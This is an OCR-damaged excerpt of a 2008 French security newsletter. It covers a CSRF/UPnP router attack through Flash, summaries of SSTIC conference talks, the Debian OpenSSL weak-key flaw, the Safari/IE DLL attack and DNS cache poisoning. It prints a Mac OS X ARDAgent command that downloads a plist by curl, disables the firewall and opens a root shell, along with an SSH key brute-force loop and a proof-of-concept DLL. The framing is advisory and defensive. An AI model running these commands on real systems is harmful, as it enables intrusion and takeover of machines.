La premire et deuxime frame vont chacune charger une page HTML contenant une animation Flash. Ces animations vont envoyer une requte SOAP sur l!adresse iP du routeur ADSL an de natter les ports 139 et 445. L!adresse IP du routeur principal est 95% 192.168.1.1 . Il est cependant possible, en Flash, de dterminer l!adresse IP exacte du routeur, mais ce n!est pas le but de cet article. La dernire frame charge la page html http:// www.xmcopartners.com/index.html qui est la page principale du site internet. Le cadre associ cette frame est de 100%. Ainsi, seule cette dernire frame sera visible par l!utilisateur. " Les animations Flash utilises ont t codes en Flex (langage propritaire d!Adobe). Voici le code source d!une de ces animations":
L!utilisateur victime, pense visualiser un site habituel.
Cependant, deux appels UPnP ont t effectus grce aux animations ash charges discrtement.
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![17]
LACTU SCU N20
L!interface d!administration du routeur ADSL de la victime, indique que les ports demands ont bien t ouverts dans la partie UPnP.
Enn, nos tests ont dmontr que certains routeurs ADSL empchaient le NAT de port considr comme dangereux" : 138, 139 et 445. Un attaquant ne pourrait alors pas visualiser les chiers partags comme dans notre exemple. A l!inverse, certaines interfaces d!administration ne proposent pas de visualiser les ports natts par le service UPnP. L!attaque est alors indtectable, et un utilisateur ne peut supprimer les ports natts par ce service qu!en dveloppant un script envoyant des requtes UPnP ...
Conclusion
Les animations Flash ont t jusqu! prsent une arme redoutable pour mener des attaques CSRF puisqu!elles permettent d!envoyer des requtes HTTP sur un domaine tiers. Coupl l!exploitation des faiblesses du protocole UPnP, ces dernires s!avrent trs utiles et parfaites pour de telles attaques. Adobe vient tout juste de corriger cette faille. Cependant, de nombreux internautes restent encore vulnrables tant que leur version du lecteur Flash ne sera pas jour. C'est pourquoi nous vous recommandons de mettre jour votre lecteur Flash, de dsactiver le service UPnP sur tous vos routeurs si vous savez natter vous mme vos ports via l!interface d!administration.
L!attaquant peut alors visualiser les dossiers partags de sa victime depuis Internet ( condition qu!un partage soit activ).
Les routeurs ADSL franais Sur les principaux routeurs ADSL franais, le service UPnP est activ par dfaut mis part sur la Freebox qui n!implmente pas ce service. Tous les routeurs sont donc vulnrables une attaque CSRF cependant les fonctionnalits offertes par les diffrents constructeurs franais restent limites. Seule la fonction de NAT de port reste la plus dangereuse. L! attaque que nous vous avons dcrite comporte certaines limitations. En effet, chaque constructeur implmente un ControlURL qui lui est propre. Un pirate voulant raliser une attaque de grande envergure devrait alors charger un chier Flash envoyant de nombreuses requtes (une pour chaque ControlURL des diffrents constructeurs). De plus, certains constructeurs attribuent un port dynamique pour le serveur web lanc par UPnP, modi chaque dmarrage. Ce choix ne scurise pas davantage le routeur (puisque le choix du port reste toujours dans un espace rduit).
Webographie
[1] ActuScu n11 : Les attaques CSRF h t t p : / / w w w. x m c o p a r t n e r s . c o m / a c t u - s e c u / actu_secu_fevrier2007.pdf [2] Blog de Jeremiah Grossman sur l ! tude crossdomain.xml http://jeremiahgrossman.blogspot.com/2008/05/ crossdomainxml-invites-cross-site.html
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![18]
LACTU SCU N20
SSTIC
SSTIC
La sixime dition de la confrence SSTIC (Symposium sur la Scurit des Technologies de l'Information) sest droule cette anne Rennes du 4 au 6 juin. Elle rassemble la fois des chercheurs, des consultants, des institutionnels ou mme des tudiants viennent partager leurs travaux au sein de multiples confrences. Ces dernires couvrent les principaux thmes de la scurit des systmes dinformations!: du social engineering, de la virologie en passant par des attaques matrielles Voici un petit rsum des interventions qui nous ont le plus marqus...
XMCO | Partners
Anatomie dun dsastre annonc La SSTIC commena par une confrence tenue par Marcus Ranum (Tenable Network Security). Ce dernier, explique l! origine invitable des catastrophes informatiques en essayant de les inscrire au sein d!un processus classique. Concrtement, lorsqu!une ide est mauvaise, mais qu!elle provient de la haute hirarchie, le manque d!opposition et une coute approximative conduisent la ralisation de cette mauvaise ide. Lorsqu!une ide dangereuse est lance, elle ne s!arrte plus. Marcus Ranum continue sa prsentation en dressant un futur plutt pessimiste. Il met l!accent sur l!norme diffrence entre la perception de la scurit et ce qui est rellement mis en place. Il insiste en expliquant que ce foss ne va cesser de s!agrandir dans les annes venir. Une remarque plutt pertinente de Marcus Ranum ft": Lorsqu!une ide est mauvaise ds le dpart, peu importe les solutions, correctifs, service pack ou autres, elle restera toujours mauvaise. Quelles sont les solutions envisageables pour lutter contre ces dsastres?
Si le cycle de conception est dj termin et le projet fonctionnel, il ne reste qu ! une seule solution : l!application de correctif pour tenter de corriger au mieux les erreurs Il dnie des recommandations plus gnriques comme viter les abus de langage": "Scuris" n!est pas la mme chose que "relativement scuris" bref ne pas cacher les risques potentiels.
LACTU SCU N20
Activation des cartes puce sans contact linsu du porteur Aprs une premire confrence gnraliste, Christophe Mourtel (Gemalto) nous propose une intervention plus technique sur l!activation des cartes puce via un champ magntique. Dans les annes venir, les cartes sans contact pourront par exemple remplacer les cartes de paiement traditionnelles ou piste magntique. MasterCard dveloppe actuellement cette technologie avec le nouveau systme de paiement PayPass (en test aux tats-Unis). Cependant, la scurit de ces nouveaux moyens de paiement reste encore oue et une problmatique se pose alors, comment empcher l!activation de ces cartes l!insu de son utilisateur... En effet, dans le cas d!une carte sans contact, la communication peut s!tablir si cette dernire se situe dans un primtre maximum de 30 cm . Les problmes de scurit sont donc bel et bien prsents puisqu!il est thoriquement possible de rcuprer des donnes entre l!metteur et le rcepteur. Aprs avoir rappel les principes de cette technologie (frquence de fonctionnement, transmission de donne...), Christophe Mourtel prsente les diffrents types d!attaque": passive ou active. Les attaques dites passives permettent de rcuprer des informations pendant un change autoris entre le produit et un lecteur (snifng). la diffrence de ces dernires, les attaques dites actives ncessitent une sollicitation de l!attaquant sur le matriel vis l!insu de la victime. Lors de sa prsentation, l!auteur a dmontr de manire thorique, une attaque active de type "relai".
Par exemple, imaginons le scnario d!attaque suivant": Deux pirates" : le premier proche de la victime active sa carte son insu et transmet les informations son acolyte. Le deuxime reoit les donnes et les transmet la centrale de paiement. Bilan": la victime rgle une facture son insu.
1. Activation et lecture de la carte 2. Relai des informations son complice 3. Rglement de la facture en utilisant la carte bleu de la victime
On regrettera l!absence de dmonstration live...
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![20]
Des mthodes existent pour lutter contre ces attaques, par exemple crer une cage de Faraday autour de la carte (protge des interfrences lectromagntiques) dlivrable sous forme d!un tui spcial, cependant une telle solution oblige l!utilisateur sortir sa carte (utilit d!une carte sans contact" ?!). Il serait possible de mettre en place un bouton poussoir (capable d!activer le champ magntique), d!crire physiquement un code sur la carte qui servira de code d!accs aux donnes sensibles.
LACTU SCU N20
L'expertise judiciaire des tlphones mobiles Le march actuel sur les tlphones mobiles est grandissant, de nouveaux venus comme Sony-Ericsson ou l!arrive du iPhone est en train de bouleverser les parts de march que se disputaient Nokia, Samsung, Motorola Aujourd!hui prs de 3 milliards de personnes utilisent des tlphones mobiles. l!heure actuelle, la perquisition du matriel hi-tech que ce soit ordinateur, PDA, ou encore tlphones mobiles est vital pour l!avancement des enqutes judiciaires. David Naccache (Ecole Normale Suprieure) dresse un panel des diffrentes donnes prsentes au sein d!un tlphone, que ce soit des donnes utilisateurs (photo, vido wap bookmarks ) ou des donnes propres au mobile ou aux oprateurs. L!intervenant explique ensuite les diffrentes mthodes pour rcuprer les informations contenues sur le tlphone. Un des problmes rside dans la connaissance du code PIN de la carte SIM, ensuite il faut russir analyser le contenu du tlphone an d!en extraire les diffrentes donnes. Cependant, pour accder ces dernires il faut russir outrepasser le code pin. Une mthode consiste demander gentiment le code l!accus, mais ces derniers souffrent souvent d!amnsie Une autre solution consiste perquisitionner l!oprateur et lui demander de communiquer le code PUK la police (code utilis pour dbloquer le tlphone aprs avoir saisi 3 reprises un mauvais code PIN). Enn, la dernire mthode consiste utiliser des applets malicieuses. Lorsque le suspect sort de sa garde vue, il rcupre son tlphone et le ractive. On force alors ce dernier tlcharger l!applet via un SMS MMS spcialement conu. Le dernier moyen utilis rentre-t-il vraiment dans un cadre lgal"? Les autorits ont-elles le droit de backdoorer un suspect, quels sont les limites et le cadre des coutes"?
Bogues ou pigeages des processeurs!: quelles consquences sur la scurit!? Cette prsentation thorique expliquait les consquences scuritaires sur un systme d!exploitation qui fonctionnerait avec un processeur X86 corrompu. Aprs avoir rappel les caractristiques d ! une architecture X86, Loc Duot (DCSSI) explique qu! partir d!une application possdant des droits basiques, il est possible d!obtenir des privilges systmes en toute discrtion sur une machine dont le processeur est backdoor.
Les solutions permettant de se protger contre un pigeage matriel sont": ! Rduire le nombre d!applications qui s!excute sur le systme. ! Supprimer les logiciels de compilation. Cette prsentation est claire et prcise, cependant, il est dommage que cette dernire se base uniquement sur l ! hypothse d ! un processeur pig, mais actuellement en existe-t-il vraiment"?
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![21]
Un exemple de pigeage de processeur rside dans la modication de l ! instruction SALC qui permet normalement de modier la valeur du registre. Aprs modication de cette instruction, un processus "classique " peut obtenir des privilges maximums. Cependant, cette attaque ne fonctionne que dans certaines congurations de gestion de mmoire.
LACTU SCU N20
Autopsie et observation in vivo dun banker La confrence suivante prsente les spcicits techniques du malware nomm " Anserin/Torpig" "; l'ennemi numro un des banques en ligne. Nos chers collgues Frdric Charpentier et Yannick Hamon ont suivi pendant une anne l!volution de ce banker capable de djouer les claviers virtuels et les autres protections anti-keylogging. Ce virus a pour principal objectif de voler tous les mots de passe saisis sur la machine de la victime (comptes bancaires, messagerie, site de jeux en ligne), mais il est surtout redoutable pour subtiliser les identiants bancaires. Pour cela, ce virus dvelopp par de vrais professionnels possde des fonctionnalits volues d!injection de faux formulaire lors de la visite des plus grandes banques mondiales (il gre plus de 500 banques diffrentes). Ce dernier s!attache Internet Explorer et remplace les vritables formulaires d!authentication par un formulaire identique, mais qui demande des informations sensibles (numro de carte, date d!expiration, CVV2). La communication du malware avec les pirates s!effectue grce deux serveurs distincts dont leurs rles sont clairement dni. Le premier nomm Collector serveur va permettre de rcuprer et de stocker toutes les informations voles, il distribue galement les mises jour du malware. Le deuxime serveur (optionnel) nomm injector serveur va permettre de distribuer de fausses pages d!authentications relatives aux banques attaques.
* Si oui, le injector server injecte au sein de la page web lgitime, un formulaire malicieux. Ce dernier au sein demande des informations condentielles la victime.
Formulaire d!authentication d!une banque
Formulaire inject par Anserin lors de l!authentication sur la banque en ligne
Un internaute imprudent saisit ses informations sensibles (numro de carte bleue, CVV2) qui sont ensuite envoyes au collector server. Le dveloppement de ce malware a mme t conu pour rsister la fermeture ventuelle des serveurs. Une des techniques rside dans la transmission de l!adresse IP de l!injector server lors des diverses mises jour. La seconde repose sur la gnration pseudo-alatoire du nom de domaine du Collector Server. Ainsi, le malware peut reprendre contact avec son serveur matre tout moment. Nos collgues ont monitor pendant plusieurs mois le fonctionnement de ce malware par l!intermdiaire de scripts en contournant, chaque fois, les backlists mises en place par les pirates. Enn pour conclure cette prsentation, nos consultants ont soumis des ides an de lutter contre ce genre de malware" : implmentation d ! une authentication double canal (demander une conrmation au client via l ! envoi d ! un SMS), bannissement des adresses IP par le Fai?
Concrtement, comment ce malware agit-il"? * Un internaute souhaite se logguer sur la banque * le virus consulte le injector server pour savoir s!il possde une fausse page d!identication relative la banque demande
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![22]
LACTU SCU N20
SinFP, unication de la prise d'empreinte active et passive des systmes d'exploitation Patrice Auffret (Thomson) dcrit les limitations des diffrents outils de ngerprinting du march (permets de dterminer quel type de systme d!exploitation est utilis ) comme nmap, p0f avant d!expliquer les amliorations et les techniques utilises par SinFPCe logiciel a t conu an de dterminer dans les pires conditions possible (un seul port ouvert, ltrage ) le systme d!exploitation utilis sur la machine distante. Aprs avoir rappel les deux grands modes utiliss": actif (Envoi de requtes an de provoquer des rponses) et passif (snifng), l!intervenant dveloppe le fonctionnement de SinFP. En effet, cet outil utilis en mode actif envoie au maximum trois paquets sur le MEME port TCP ouvert contrairement nmap qui scan l!ensemble des ports TCP. Cette caractristique rduit les probabilits d ! tre dtect par un IDS. Les diffrentes requtes envoyes sont un paquet TCP SYN sans option TCP, un paquet TCP SYN avec de nombreuses options TCP et un paquet TCP SYN ACK. Cette mthode permet d!obtenir une signature de faon simple et fonctionnelle. En utilisant des masques de dformations pour adapter sa vision de la signature au cas pratique dans lequel il est utilis et pouvoir identier avec la plus grande probabilit le systme d!exploitation. La capture suivante illustre le rsultat d!un scan SinFP. P1,P2,P3 correspondent aux 3 paquets envoys. Les 15 chiffres associs chaque paquet correspondent la signature de l!OS interprte par SinFP.
mthode fournie de trs bon rsultat, mais demande de bonnes connaissances et la seconde dite dynamique" : on excute le malware et on observe ses actions. Dans la seconde mthode, on a donc deux postes, un observateur qui coute le trac, qui mule diffrents services (DNS, SMTP, HTTP) en enregistrant toutes les actions du code malveillant. Le deuxime ordinateur contient donc le malware qui est excut, et possde une conguration permettant de diriger n!importe quel ux vers la machine d!observation.
On peut ensuite comparer les bases de registres, tudier les logs La prsentation de Philippe LAGADEC (NATO / NC3A) fournit les bases pour l!laboration d!un laboratoire d!analyse dynamique de codes malveillants. Les rump sessions Concernant les # rump sessions!, une bonne vingtaine ont eu lieu. Le dpartement R&D de FT a prsent un outil de conception qui permet de retrouver une cl SSH vulnrable en moins de 5 minutes et accessoirement de dchiffrer les communications SSH captures dans des paquets pcap. L!ESL expose une technique pour ralise des blind injection SQL en utilisant des retardateurs pour l!excution des requtes Des sessions plus lgres avec Nikoteen qui dmontre que lorsqu!on a une ide en tte, il est difcile de passer outre, preuve l!appui avec la chanson "Still Loving You" de et le passage o on *peut* entendre "ce soir j'ai les pieds qui puent" en lieu et place de "[...] so strong that I can't get through ". Enn, Cdric Blancher a fait trembler le MINEFI et l!assemble en faisant croire que les certicats dlivrs par le ministre taient vulnrables la faille OpenSSL (voir article suivant).
Rsultat d!un scan avec SinFP
En se basant sur les trois signatures obtenues (et avec utilisation d!un masque de dformation), le scanner est alors en mesure de donner le systme d!exploitation de la machine cible. Dynamic malwares analysis for dummies La dernire confrence de la SSTIC explique comment tudier le comportement d!un malware sous Windows de faon simple. Connatre le comportement d!un code malveillant est utile et peut fournir de nombreux renseignements . En effet, on peut obtenir des informations sur la source de l!attaque, dterminer les fonctionnalits du malware (virus, cheval de Troie, keylogger...), les modications engendres sur le systme, connaitre les machines vulnrables Il existe deux types d!analyse l!une dite statiques": dsassemblage du code et analyse de ce dernier, cette
Webographie
[1] Site ofciel de la SSTIC http://www.sstic.org/SSTIC08/info.do [2] Blog de Cdric Blancher : http://sid.rstack.org/blog/
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![23]
LACTU SCU N20
LES MENACES DU MOIS
Tendance de lactivit malicieuse dInternet :
Petit tour dhorizon des failles de scurit, prsentes par les consultants en charger de notre service de veille....
XMCO | Partners
Depuis n Mai, plusieurs vulnrabilits majeures ont t dcouvertes. Ces dernires ont aussi bien touch des failles de logiciels utiliss sur des postes client comme sur des serveurs. Les deux vulnrabilits majeures ont affect des problmes d!entropie dans OpenSSL et dans BIND (DNS). La presse comme les chercheurs en scurit se sont particulirement intresss ces deux problmes majeurs. Le second dont peu d!informations ont t publies sera d!ailleurs dtaill lors de la confrence BlackHat. Nous dtaillerons galement deux problmes critiques qui ont affect Mac OS X (lvation de privilges ) et le couple Safari/Internet Explorer (compromission d!un systme)...bref des failles de scurit comme on les aime!
Enn, nous prsenterons galement deux virus qui ont, sans doute, agac plus d!un de nos lecteurs...
LACTU SCU N20
La faille OpenSSL de Debian
Vulnrabilits
OpenSSL sous Debian La vulnrabilit qui a fait le plus couler d!encre ces derniers temps concerne OpenSSL implment sur les distributions Debian et Ubuntu. Une faille de scurit critique a t mise en vidence au mois de Mai 2008 et cette dernire concerne toutes les clefs et les certicats gnrs depuis un systme Debian durant les deux dernires annes...aie. Revenons sur ce problme qui doit, encore l!heure actuelle, affoler les RSSI et les administrateurs UNIX."Si vous n!avez jamais entendu parler de ce problme majeur, lisez en dtail cet article et planiez ds prsent une runion de crise avec vos administrateurs... L!histoire commence il y a deux ans. A la suite d!une plainte d'un diteur qui avait des problmes de compatibilit avec la version d'OpenSSL, un dveloppeur Debian pensant corriger le problme en question a introduit, par mgarde (on l!espre), un bug au sein d!OpenSSL. En effet, les quelques lignes de code modies ont, pour faire simple, supprim le facteur alatoire ncessaire la gnration des clefs publiques/prives. Cette faille, de type cryptographique, provient du gnrateur de nombres pseudo-alatoires (PRNG) de OpenSSL utilis pour crer les cls publiques et prives. La graine d'ala tait gale au PID (identiant du processsus) en cours d'utilisation. Sur un systme Linux (plateforme x86), seules 2^15 (32768) valeurs sont possibles. Le facteur alatoire est donc considrablement compromis.
En consquence, toutes les cls SSL et SSH gnres depuis une machine Linux Debian et Ubuntu doivent tre rgnres."
Les certicats sont galement concerns: ils doivent tre rvoqus, rgnrs et resigns par l'Authorit de Certication. Ces oprations doivent videmment tre ralises suite la mise jour de OpenSSL. Deux types d'attaques sont possibles: le dchiffrement de trames captures ou le contournement des mcanismes d'authentication par cls."
En consquences, toutes les clefs SSL et SSH

gnres depuis deux ans sur une machine Linux Debian et Ubuntu doivent tre rgnres
Ainsi les serveurs SSH autorisant ce type d'authentication sont potentiellement vulnrables quelque soit leur systme d'exploitation (Unix, BSD, Linux...). En effet, si le serveur autorise un utilisateur s'authentier l'aide d'une cl publique et que les cls de l'utilisateur ont t gnres depuis un systme Debian/Ubuntu vulnrable, un pirate peut bruteforcer cette authentication en un maximum de 32768 tentatives. L'attaquant doit tout de mme connatre le login associ cette authentication, par exemple root."
Cette faille est apparue en Septembre 2006 et ft corrige le 13 Mai 2008. Ainsi, toutes les applications utilisant la fonctionnalit PRNG de OpenSSL des distributions Debian et Ubuntu sont donc vulnrables."
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![25]
LACTU SCU N20
Le nombre de tentatives peut tre considrablement rduit en prenant compte du fait qu'un systme Debian/ Ubuntu incrmente squentiellement la valeur des PID.
Les valeurs des PID utilises pour la gnration de cls d'utilisateurs SSH ont de trs grandes chances d'tre comprises entre 500 et 10000, soit 9500 possibilits.
Rfrence : http://metasploit.com/users/hdm/tools/debian-openssl/
INFO...
Tor galement vulnrable
Quelques semaines aprs la dcouverte de la faille OpenSSL, d'autres applications utilisant la version vulnrable d'OpenSSL refont parler d'elles. La dernire en date n'est autre que le rseau Tor permettant d'anonymiser le trafic sur Internet (voir [1] ActuScu n 19). En effet, prs de 300 relais sur les 1500/2000 relais disponibles (soit prs de 1/6) implmenteraient une version d'OpenSSL dfectueuse. Les consquences sont alors importantes. Si les derniers noeuds d'un circuit Tor implmentent des clefs faibles, les donnes transitant par ces noeuds pourraient alors tre dchiffres par un des propritaires de ces noeuds.
Liste des 32768 clefs gnres
Plusieurs outils ont t publis pour gnrer toutes les cls possibles en fonction de l'algorithme (DSA/RSA) et la taille de la cl. Le site "metasploit.com" propose galement en tlchargement les archives suivantes : - SSH 1024-bit DSA Keys x86 (30.0M) - SSH 1023-bit RSA Keys x86 (25.0M) - SSH 1024-bit RSA Keys x86 (26.0M) - SSH 2047-bit RSA Keys x86 (48.0M) - SSH 2048-bit RSA Keys x86 (48.0M) - SSH 4096-bit RSA Keys x86 (94.0M) - SSH 8192-bit RSA Keys x86 (PID 1 4100+) (29.0M) Une simple boucle excutant la commande "ssh root@server -i <clef tester>" permettrait un pirate de prendre le contrle des serveurs vulnrables implmentant l'authentication par clef. Une telle attaque serait donc bruyante (minimum de 9500 tentatives de connexions) mais pourrait tre ralise si aucun mcanisme de bannissement d'IP n'tait mis en place ou si les administrateurs n'taient pas vigilants. Les captures suivantes illustrent l!exploitation de cette vulnrabilit. Nous avons dvelopper un script capable d!automatiser l!attaque. En 20 minutes, nous avons pu identier la clef de notre serveur...
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![26]
LACTU SCU N20
Safari et Internet Explorer : quand Microsoft rencontre Apple...
Prise de contrle dun systme via IE et Safari Continuons la srie des vulnrabilits critiques de ce mois. Aprs Debian, ce fut au tour d!Internet Explorer d!tre de nouveau montr du doigt. En effet, un problme de scurit identi dans Safari pour Windows mais connu depuis quelques mois a refait parler de lui la suite de la publication d'un vieil exploit pour Internet Explorer. Ce premier problme, dont l!attaque drive a t baptise "Carpet Bomb", concerne Safari. Le chercheur Nitesh Dhanjani (connu galement pour sa rcente intervention la Blackhat) a, depuis plusieurs semaines, mis en garde les utilisateurs du navigateur d'Apple [1]. En effet, le tlchargement de chiers non interprtables par le navigateur (dll, excutables, chiers compresss), est ralis de manire automatique sous Safari. Ainsi, lorsqu!un utilisateur clique sur un lien de tlchargement, Safari l ! enregistre automatiquement sur le bureau de l!utilisateur sans aucune conrmation pralable (contrairement aux autres navigateurs). Ce problme de scurit ne constitue pas une faille de scurit part entire, cependant couple une seconde vulnrabilit, cette attaque pourrait s'avrer dramatique...
Suite la publication de Microsoft [3] alertant sur une possible excution de code avec Safari, un internaute publie, le 10 juin, une preuve de concept (dj publi en dcembre 2006) permettant d'exploiter la vulnrabilit d'Internet Explorer. L'attaque est donc aujourd'hui pleinement exploitable sur un systme implmentant les deux navigateurs et pourrait avoir des consquences dramatiques... Le scnario d'attaque est simple. En utilisant une balise iframe sur une page contrle par le pirate, ce dernier peut forcer un utilisateur naviguant avec Safari, tlcharger sur son bureau, une librairie DLL malicieuse (schannel.dll).
Code de la page web malicieuse
Lutilisation conjointe de Safari et dInternet

Explorer permet un pirate de prendre le contrle dun systme en incitant sa victime visiter une page web malicieuse...
Quelques jours plus tard, on retrouvait un commentaire [2] prcisant qu'une vulnrabilit dcouverte dans Internet Explorer deux ans auparavant, mais jamais corrige serait adapte l!exploitation de l'attaque dcrite par M.Dhanjani. Ce second problme, li Internet Explorer permet d!excuter automatiquement certaines librairies (sqmapi.dll, imageres.dll et schannel.dll) stockes sur le Bureau lors du lancement du navigateur.
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![27]
LACTU SCU N20
Lors de la prochaine excution d'Internet Explorer, le navigateur va automatiquement charger et excuter le code contenu dans la librairie malicieuse.
De son ct, Apple a pris note de la remarque de M. Dhanjani et a jug ce problme de la manire suivante : ...the ability to have a preference to "Ask me before downloading anything" is a good suggestion. We can le that as an enhancement request for the Safari team. Please note that we are not treating this as a security issue, but a further measure to raise the bar against unwanted downloads...
En attendant les correctifs adquats, nous vous conseillons de ne pas utiliser conjointement Safari et Internet Explorer et de ne jamais tlcharger de chiers DLL lors de vos navigations avec Internet Explorer. Rfrences : Exemple d!un code d!une libraire DLL malicieuse [1] http://www.oreillynet.com/onlamp/blog/2008/05/ safari_carpet_bomb.html [ 2 ] h t t p : / / a v i v. r a f f o n . n e t / 2 0 0 8 / 0 5 / 3 1 / SafariPwnsInternetExplorer.aspx [3] http://www.microsoft.com/technet/security/advisory/ 953818.mspx
Le code ci-dessous, compil sous le nom "schannel.dll" permet de lancer la calculatrice de Windows.
CODE
#include<windows.h> BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved ) { STARTUPINFO si; PROCESS_INFORMATION pi; TCHAR windir[_MAX_PATH]; TCHAR cmd[ _MAX_PATH ]; GetEnvironmentVariable("WINDIR",windir,_MA X_PATH ); wsprintf(cmd,"%s\\system32\ \calc.exe",windir); ZeroMemory(&si,sizeof(si)); si.cb = sizeof(si); ZeroMemory(",sizeof(pi)); CreateProcess(NULL,cmd,NULL,NULL,FALSE, 0,NULL,NULL,&si,"); CloseHandle(pi.hProcess); CloseHandle(pi.hThread); return TRUE; }
Ces vulnrabilits pourraient donc tre l'origine de nombreuses attaques, car Microsoft n'a toujours pas corrig ce problme.
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![28]
LACTU SCU N20
Comment devenir root sur un Mac OS X
lvation de privilges sous Mac OS X La socit Intego vient de dcouvrir une vulnrabilit importante au sein des systmes d!exploitation d!Apple Mac OS X 10.4 (Tiger) et Mac OS X 10.5 (Lopard) [1]. La vulnrabilit dcouverte permet un utilisateur malveillant d!obtenir des privilges administrateur (root).Le problme est li une erreur de permissions, prsente au sein de ARDAgent, l!application permettant de prendre le contrle d'une machine via Apple Remote Management).
Excution d!une commande avec des droits root La capture prcdente illustre l!exploitation de la vulnrabilit. Aucun outil n!est utilis. L!utilisation d!un logiciel d!excution d!Apple Script (natif) avec les paramtres appropris permet ici d ! excuter la commande whoami (quel utilisateur suis-je) avec les permissions root. Il est donc" possible avec une commande judicieuse d!obtenir un accs distant root sur un systme Mac OS X"! La commande suivante permet de tlcharger et de charger un chier de conguration, de dsactiver le pare-feu et enn de lancer un shell en coute sur un port dsir...
xxxscript -e 'tell app "ARDAgent" to do shell script "cd /System/Library/ LaunchDaemons ; curl -o bash.plist http:// cdslash.net/temp/bash.plist [cdslash.net] ; chmod 600 bash.plist ; launchctl load bash.plist ; launchctl start com.apple.bash ; ipfw disable firewall; launchctl "'
Lexcution dune simple commande shell

permet un pirate dobtenir un shell distant en tant quutilisateur root
Cette application possde des permissions spciales": le setuid bit. Le setuid indique au systme que l!excution du programme devra tre faite avec les droits de propritaire du programme plutt qu!avec les droits de l!utilisateur courant. Le programme ARDAgent appartient au super-utilisateur root. Ainsi, lors de l'excution du programme, celui-ci dtient les permissions root sans avoir saisir le mot de passe de ce compte. Les chercheurs de la socit Intego ont dmontr le moyen de lancer des scripts "AppleScript" travers ARDAgent. Ainsi, il est possible d'excuter n'importe quelle commande avec les privilges du compte root sans connatre le mot de passe. La commande en question a dj t diffuse sur plusieurs forums. " Commande :
#xxxscript -e 'tell app "ARDAgent" to do shell script "<commande>"'
Aucun correctif n ! est actuellement disponible. Cependant, plusieurs protections existent": La premire consiste activer le service "Gestion distance" (Remote Management) partir du menu Partage des Prfrences Systme. " Il est bien sr conseill de dsactiver toutes les options an d!viter d!exposer sa machine l!administration distante comme le montre la capture suivante":
Exemple :
#xxxscript -e 'tell app "ARDAgent" to do shell script "whoami"' root
Dsactivation de la Gestion Distance

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![29]
LACTU SCU N20
La commande n!est alors plus excute
Il est galement possible de supprimer l!application ARDAgent.app prsente au sein du rpertoire / System/Library/CoreServices/RemoteManagement Enn, vous pouvez modier les droits de l!excutable en question avec la commande suivante :
sudo chmod -R u-s /System/Library/ CoreServices/RemoteManagement/ARDAgent.app
Cependant, l!excution de cette commande pourrait avoir des consquences (dsactivation des mises jour). En conclusion, la scurit d!Apple Mac OS est la mme que celle de tout systme Unix. Les failles setuid ont toujours exist sur les systmes Unix, Mac OS X ne passera donc pas ct. Rfrences": [1] http://www.intego.com/news/ism0802.asp [2]http://www.securemac.com/applescript-tht-trojanhorse.php
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![30]
LACTU SCU N20
Faille DNS : Internet tait-il mena ?

d'utilisateurs vers des sites malveillants.
Exploitation facilite d!une faille connue La faille du protocole DNS Aprs une alerte majeure de l!Internet Systems Consortium (ISC) sous le titre ANYONE RUNNING BIND AS A CACHING RESOLVER IS AFFECTED, les principaux diteurs (Microsoft, Sun, Cisco, IBM) ont publi un correctif sur le logiciel BIND, le moteur DNS le plus rpandu sur Internet. En quelques heures, cette alerte a dferl dans les mdias et a t diffuse par l!AFP": tout a t dit et crit dessus... D!aprs les premires informations publies, cette faille ne semble pas tre nouvelle ! Il s'agit d'une faille de scurit inhrente au protocole DNS, connue depuis des annes. La nouveaut rside priori dans une nouvelle mthode d'exploitation qui permettrait de corrompre efcacement et durablement le cache des serveurs DNS. Jusqu'alors, les attaques de DNS Cache-Poisonning ne pouvaient fonctionner que sur un laps de temps rduit. Les hypothses que nous mettons dans la suite de cet article seront conrmes ou inrmes les semaines prochaines... Risque"? Un pirate serait en mesure de changer malicieusement l'adresse IP d'un serveur connu dans un serveur DNS public. Ds lors, tous les utilisateurs de ce serveur DNS seraient dups et redirigs vers la fausse adresse IP. Ce type d'attaque consiste corrompre un serveur DNS pour qu'il redirige ses utilisateurs vers des sites malicieux (man-in-the-middle, faux sites, etc). Lorsque l'on sait que le systme DNS est la base de l'Internet, il est possible d'imaginer une attaque o plus personne ne serait sr de visiter un vrai site web. La consquence aurait pu tre une sorte d'attaque de phishing globalise
Principe de l!attaque L'attaque peut tre ralise lorsqu'un serveur DNS ne connait pas l'URL demande par un internaute et interroge donc un autre serveur DNS au-dessus de lui dans la hirarchie DNS. Pour bien comprendre l'attaque, il faut imaginer le scnario suivant : Revenons donc en dtail sur cette alerte de scurit qui a secou les diteurs et a fait beaucoup crire... L!alerte est due une vulnrabilit appele 'DNS Cache Poisonning' qu!un chercheur en scurit informatique, Dan Kaminsky, s!apprte prsenter lors de la confrence BlackHat Las Vegas. Cette vulnrabilit permettait un attaquant de corrompre l'intgrit d'un ou plusieurs serveurs DNS. d'Internet et d'tre en mesure de rediriger des millions
T0, Serveur A demande un Serveur B : "Connais-tu l'adresse IP de cette URL l car je ne la connais pas ?" T0+n, Serveur Pirate : "Oui, la voici : adresse-IP usurpe". T0+N, Serveur B : "Oui, la voici : vritable adresse IP". T0+x : Serveur A "Merci, j'enregistre cette rponse pour ne plus te la demander l'avenir". Le pirate rpond avant que le vrai serveur DNS ait eu le temps de rpondre.
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![31]
LACTU SCU N20
